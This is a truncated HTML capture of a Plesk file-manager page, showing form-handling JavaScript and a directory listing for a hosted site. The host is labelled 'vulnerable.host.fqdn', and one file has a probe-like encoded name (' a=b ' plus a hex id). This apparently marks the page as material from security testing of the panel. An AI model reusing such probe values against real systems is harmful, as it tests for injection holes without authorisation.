                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/create-file/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-create-dir" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_dir_oC();return false;" style=""><BUTTON name="bname_create_dir" id="buttonid-create-dir" type="button" onClick="Event.stop(event);new_dir_oC();return false;">Add New Directory</BUTTON><SPAN id="spanid-create-dir">Add New Directory</SPAN></DIV>
           <DIV class="commonButton" id="bid-create-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new file.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_file_oC();return false;" style=""><BUTTON name="bname_create_file" id="buttonid-create-file" type="button" onClick="Event.stop(event);new_file_oC();return false;">Add New File</BUTTON><SPAN id="spanid-create-file">Add New File</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>&nbsp;</td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();" onMouseOver="f(event, &#039;pdir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_pdir.gif" width="16" height="16" alt="file_pdir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">..</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 03:11 PM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_App_Data" value="App_Data" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();">App_Data</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=App_Data" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2FApp_Data" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_css" value="css" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();">css</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=css" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fcss" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_img" value="img" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();">img</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/img" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=img" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fimg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_picture_library" value="picture_library" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();">picture_library</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/picture_library" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=picture_library" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fpicture_library" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_test" value="test" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();">test</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/test" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=test" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Ftest" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%200fd28a9909b" value="%20a%3db%200fd28a9909b" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%25200fd28a9909b" onClick="return bin();;lon();">%20a%3db%200fd28a9909b</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A 